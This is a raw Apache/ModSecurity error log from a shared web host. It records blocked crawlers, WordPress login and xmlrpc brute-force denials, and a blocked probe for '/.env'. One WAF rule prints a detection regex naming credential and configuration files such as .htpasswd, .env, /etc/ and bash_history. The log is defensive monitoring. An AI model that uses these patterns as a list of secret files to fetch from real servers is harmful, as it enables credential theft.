[Tue May 26 17:19:49.720055 2026] [autoindex:error] [pid 869189:tid 869379] [client 185.92.25.54:0] AH01276: Cannot serve directory /home2/whitece9/bookmyitem.com/wp-includes/js/tinymce/skins/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 17:19:50.224811 2026] [security2:error] [pid 869189:tid 869396] [client 185.92.25.54:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "bookmyitem.com"] [uri "/index.php"] [unique_id "ahWI3tB5TZSn88J_oroGeAAAAEw"]
[Tue May 26 17:19:50.246219 2026] [security2:error] [pid 869189:tid 869421] [client 57.141.2.24:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWI3dB5TZSn88J_oroGagAAAGU"]
[Tue May 26 17:19:50.677967 2026] [security2:error] [pid 869189:tid 869426] [client 185.92.25.54:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "bookmyitem.com"] [uri "/index.php"] [unique_id "ahWI3tB5TZSn88J_oroGlAAAAGo"]
[Tue May 26 17:19:51.012014 2026] [autoindex:error] [pid 869189:tid 869340] [client 185.92.25.54:0] AH01276: Cannot serve directory /home2/whitece9/bookmyitem.com/wp-includes/js/jquery/ui/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 17:19:51.297880 2026] [security2:error] [pid 869189:tid 869421] [client 185.92.25.54:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "bookmyitem.com"] [uri "/index.php"] [unique_id "ahWI39B5TZSn88J_oroGqwAAAGU"]
[Tue May 26 17:19:51.699694 2026] [security2:error] [pid 869189:tid 869383] [client 216.244.66.241:55366] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "www.ghanemgh.com"] [uri "/robots.txt"] [unique_id "ahWI39B5TZSn88J_oroGwQAAAD8"]
[Tue May 26 17:19:51.699844 2026] [security2:error] [pid 869189:tid 869383] [client 216.244.66.241:55366] ModSecurity: Warning. Matched phrase "Dotbot" at REQUEST_HEADERS:User-agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "www.ghanemgh.com"] [uri "/robots.txt"] [unique_id "ahWI39B5TZSn88J_oroGwQAAAD8"]
[Tue May 26 17:19:51.701503 2026] [security2:error] [pid 869189:tid 869407] [client 216.244.66.241:55370] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "ghanemgh.com"] [uri "/robots.txt"] [unique_id "ahWI39B5TZSn88J_oroGwgAAAFc"]
[Tue May 26 17:19:51.701666 2026] [security2:error] [pid 869189:tid 869407] [client 216.244.66.241:55370] ModSecurity: Warning. Matched phrase "Dotbot" at REQUEST_HEADERS:User-agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "ghanemgh.com"] [uri "/robots.txt"] [unique_id "ahWI39B5TZSn88J_oroGwgAAAFc"]
[Tue May 26 17:19:51.727342 2026] [security2:error] [pid 869189:tid 869432] [client 185.92.25.54:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "bookmyitem.com"] [uri "/index.php"] [unique_id "ahWI39B5TZSn88J_oroGugAAAHA"]
[Tue May 26 17:19:52.116159 2026] [security2:error] [pid 869189:tid 869435] [client 57.141.2.49:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWI39B5TZSn88J_oroGvQAAAHM"]
[Tue May 26 17:19:52.283944 2026] [autoindex:error] [pid 869189:tid 869353] [client 185.92.25.54:0] AH01276: Cannot serve directory /home2/whitece9/bookmyitem.com/wp-includes/js/tinymce/themes/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 17:19:52.833747 2026] [security2:error] [pid 869189:tid 869233] [remote 51.91.98.45:56666] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 45.98.91.51.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWI4NB5TZSn88J_oroG3AAATio"]
[Tue May 26 17:19:52.842962 2026] [security2:error] [pid 869189:tid 869365] [client 185.92.25.54:64639] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "bookmyitem.com"] [uri "/index.php"] [unique_id "ahWI4NB5TZSn88J_oroG4AAAAC0"]
[Tue May 26 17:19:53.065468 2026] [security2:error] [pid 869189:tid 869388] [client 69.58.91.143:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahWI4NB5TZSn88J_oroG6gAAAEQ"], referer: https://www.anujtradingco.com/
[Tue May 26 17:19:53.230416 2026] [security2:error] [pid 869189:tid 869346] [client 185.92.25.54:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "bookmyitem.com"] [uri "/index.php"] [unique_id "ahWI4dB5TZSn88J_oroG8AAAABo"]
[Tue May 26 17:19:53.588636 2026] [autoindex:error] [pid 869189:tid 869417] [client 185.92.25.54:0] AH01276: Cannot serve directory /home2/whitece9/bookmyitem.com/wp-includes/js/tinymce/themes/inlite/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 17:19:53.899123 2026] [security2:error] [pid 869189:tid 869336] [client 185.92.25.54:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "bookmyitem.com"] [uri "/index.php"] [unique_id "ahWI4dB5TZSn88J_oroHCgAAABA"]
[Tue May 26 17:19:54.495461 2026] [autoindex:error] [pid 869189:tid 869331] [client 185.92.25.54:0] AH01276: Cannot serve directory /home2/whitece9/bookmyitem.com/wp-includes/js/plupload/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 17:19:54.550423 2026] [security2:error] [pid 869189:tid 869426] [client 57.141.2.57:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWI4tB5TZSn88J_oroHFQAAAGo"]
[Tue May 26 17:19:55.004765 2026] [autoindex:error] [pid 869189:tid 869375] [client 185.92.25.54:0] AH01276: Cannot serve directory /home2/whitece9/bookmyitem.com/wp-includes/rest-api/fields/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 17:19:55.332698 2026] [security2:error] [pid 869189:tid 869325] [client 185.92.25.54:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "bookmyitem.com"] [uri "/index.php"] [unique_id "ahWI49B5TZSn88J_oroHQQAAAAU"]
[Tue May 26 17:19:55.610415 2026] [security2:error] [pid 869189:tid 869336] [client 69.58.91.143:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWI49B5TZSn88J_oroHTQAAABA"], referer: https://www.anujtradingco.com/pages/services-modern/?unapproved=1285329&moderation-hash=84542eb14c9c65a12f1eb77a892d6e15
[Tue May 26 17:19:55.758100 2026] [autoindex:error] [pid 869189:tid 869387] [client 185.92.25.54:0] AH01276: Cannot serve directory /home2/whitece9/bookmyitem.com/wp-includes/blocks/code/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 17:19:55.963372 2026] [core:error] [pid 869189:tid 869418] [client 198.235.24.179:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 17:19:55.963393 2026] [core:error] [pid 869189:tid 869418] [client 198.235.24.179:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 17:19:56.029722 2026] [autoindex:error] [pid 869189:tid 869329] [client 185.92.25.54:0] AH01276: Cannot serve directory /home2/whitece9/bookmyitem.com/wp-includes/blocks/archives/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 17:19:56.241556 2026] [autoindex:error] [pid 869189:tid 869330] [client 185.92.25.54:0] AH01276: Cannot serve directory /home2/whitece9/bookmyitem.com/wp-includes/css/dist/components/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 17:19:56.550769 2026] [security2:error] [pid 869189:tid 869422] [client 185.92.25.54:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "bookmyitem.com"] [uri "/index.php"] [unique_id "ahWI5NB5TZSn88J_oroHcQAAAGY"]
[Tue May 26 17:19:56.674454 2026] [security2:error] [pid 869189:tid 869412] [client 203.194.101.7:62272] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 7.101.194.203.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahWI5NB5TZSn88J_oroHdwAAAFw"]
[Tue May 26 17:19:56.674612 2026] [security2:error] [pid 869189:tid 869412] [client 203.194.101.7:62272] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahWI5NB5TZSn88J_oroHdwAAAFw"]
[Tue May 26 17:19:57.254742 2026] [security2:error] [pid 869189:tid 869326] [client 57.141.2.38:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWI5NB5TZSn88J_oroHgQAAAAY"]
[Tue May 26 17:19:58.469307 2026] [security2:error] [pid 869189:tid 869380] [client 223.235.98.214:9099] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 214.98.235.223.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahWI5tB5TZSn88J_oroHrQAAADw"]
[Tue May 26 17:19:58.469460 2026] [security2:error] [pid 869189:tid 869380] [client 223.235.98.214:9099] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahWI5tB5TZSn88J_oroHrQAAADw"]
[Tue May 26 17:19:59.211684 2026] [security2:error] [pid 869189:tid 869392] [client 114.119.129.110:38793] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "www.rsmsi.org.in"] [uri "/"] [unique_id "ahWI59B5TZSn88J_oroH1wAAAEg"], referer: http://www.rsmsi.org.in/
[Tue May 26 17:19:59.248933 2026] [security2:error] [pid 869189:tid 869431] [client 45.154.98.38:53741] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 38.98.154.45.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "poonawallatennisacademy.com"] [uri "/xmlrpc.php"] [unique_id "ahWI59B5TZSn88J_oroH0gAAAG8"]
[Tue May 26 17:19:59.249105 2026] [security2:error] [pid 869189:tid 869431] [client 45.154.98.38:53741] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "poonawallatennisacademy.com"] [uri "/xmlrpc.php"] [unique_id "ahWI59B5TZSn88J_oroH0gAAAG8"]
[Tue May 26 17:19:59.528645 2026] [security2:error] [pid 869189:tid 869395] [client 57.141.2.9:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWI59B5TZSn88J_oroH0QAAAEs"]
[Tue May 26 17:20:00.398951 2026] [security2:error] [pid 869189:tid 869347] [client 69.58.91.143:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWI6NB5TZSn88J_oroH9wAAABs"], referer: https://anujtradingco.com
[Tue May 26 17:20:01.840282 2026] [security2:error] [pid 869189:tid 869442] [client 57.141.2.28:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWI6dB5TZSn88J_oroIGQAAAHo"]
[Tue May 26 17:20:03.154931 2026] [security2:error] [pid 869189:tid 869326] [client 112.86.225.29:60416] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:user-agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "www.cagmedya.com"] [uri "/"] [unique_id "ahWI69B5TZSn88J_oroIQwAAAAY"]
[Tue May 26 17:20:03.155062 2026] [security2:error] [pid 869189:tid 869326] [client 112.86.225.29:60416] ModSecurity: Warning. Matched phrase "Sogou web spider" at REQUEST_HEADERS:user-agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "www.cagmedya.com"] [uri "/"] [unique_id "ahWI69B5TZSn88J_oroIQwAAAAY"]
[Tue May 26 17:20:03.522072 2026] [security2:error] [pid 869189:tid 869434] [client 167.160.64.242:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahWI69B5TZSn88J_oroIUAAAAHI"], referer: https://www.anujtradingco.com/
[Tue May 26 17:20:04.058185 2026] [security2:error] [pid 869189:tid 869385] [client 57.141.2.35:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWI69B5TZSn88J_oroIVgAAAEE"]
[Tue May 26 17:20:04.965523 2026] [security2:error] [pid 869189:tid 869350] [client 167.160.64.242:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWI7NB5TZSn88J_oroIggAAAB4"], referer: https://www.anujtradingco.com/pages/services-modern/?unapproved=1467314&moderation-hash=0012c0d744789ca71da4aa11fd62ece9
[Tue May 26 17:20:05.653648 2026] [security2:error] [pid 869189:tid 869253] [remote 199.247.4.24:56844] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 24.4.247.199.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "bloggertarget.com"] [uri "/wp-login.php"] [unique_id "ahWI7dB5TZSn88J_oroIkAAAUT4"]
[Tue May 26 17:20:06.245436 2026] [security2:error] [pid 869189:tid 869440] [client 57.141.2.2:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWI7dB5TZSn88J_oroImQAAAHg"]
[Tue May 26 17:20:07.760888 2026] [security2:error] [pid 869189:tid 869346] [client 203.194.101.7:62597] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 7.101.194.203.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahWI79B5TZSn88J_oroIygAAABo"]
[Tue May 26 17:20:07.761018 2026] [security2:error] [pid 869189:tid 869346] [client 203.194.101.7:62597] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahWI79B5TZSn88J_oroIygAAABo"]
[Tue May 26 17:20:07.822940 2026] [security2:error] [pid 869189:tid 869415] [client 176.65.139.236:17774] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.politica-global.com"] [uri "/.env"] [unique_id "ahWI79B5TZSn88J_oroIywAAAF8"]
[Tue May 26 17:20:08.367576 2026] [security2:error] [pid 869189:tid 869373] [client 57.141.2.7:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWI79B5TZSn88J_oroI0gAAADU"]
[Tue May 26 17:20:08.878612 2026] [security2:error] [pid 869189:tid 869342] [client 223.235.98.214:14174] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 214.98.235.223.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahWI8NB5TZSn88J_oroI7wAAABY"]
[Tue May 26 17:20:08.878750 2026] [security2:error] [pid 869189:tid 869342] [client 223.235.98.214:14174] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahWI8NB5TZSn88J_oroI7wAAABY"]
[Tue May 26 17:20:10.527098 2026] [security2:error] [pid 869189:tid 869242] [remote 188.166.182.83:49847] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 83.182.166.188.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "christinaspromotions.com"] [uri "/wp-login.php"] [unique_id "ahWI8tB5TZSn88J_oroJDwAASTM"]
[Tue May 26 17:20:10.742069 2026] [security2:error] [pid 869189:tid 869364] [client 167.160.64.242:47445] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "anujtradingco.com"] [uri "/wp-login.php"] [unique_id "ahWI8tB5TZSn88J_oroJDgAAACw"], referer: https://anujtradingco.com
[Tue May 26 17:20:11.122848 2026] [security2:error] [pid 869189:tid 869399] [client 57.141.2.18:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWI8tB5TZSn88J_oroJGQAAAE8"]
[Tue May 26 17:20:11.834243 2026] [security2:error] [pid 869189:tid 869425] [client 185.191.171.9:18560] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/events/tag/november-27th/list/"] [unique_id "ahWI89B5TZSn88J_oroJOQAAAGk"]
[Tue May 26 17:20:11.834382 2026] [security2:error] [pid 869189:tid 869425] [client 185.191.171.9:18560] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/events/tag/november-27th/list/"] [unique_id "ahWI89B5TZSn88J_oroJOQAAAGk"]
[Tue May 26 17:20:13.460588 2026] [security2:error] [pid 869189:tid 869432] [client 157.49.220.84:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWI9dB5TZSn88J_oroJZgAAAHA"]
[Tue May 26 17:20:13.484955 2026] [security2:error] [pid 869189:tid 869378] [client 57.141.2.47:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWI9dB5TZSn88J_oroJaQAAADo"]
[Tue May 26 17:20:13.712218 2026] [security2:error] [pid 869189:tid 869215] [remote 74.7.241.58:58022] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 58.241.7.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.billing.mosykay.com"] [uri "/"] [unique_id "ahWI9dB5TZSn88J_oroJdwAAaxg"], referer: https://www.billing.mosykay.com/?path=/home1/taote1zo/public_html/shop/wp-includes
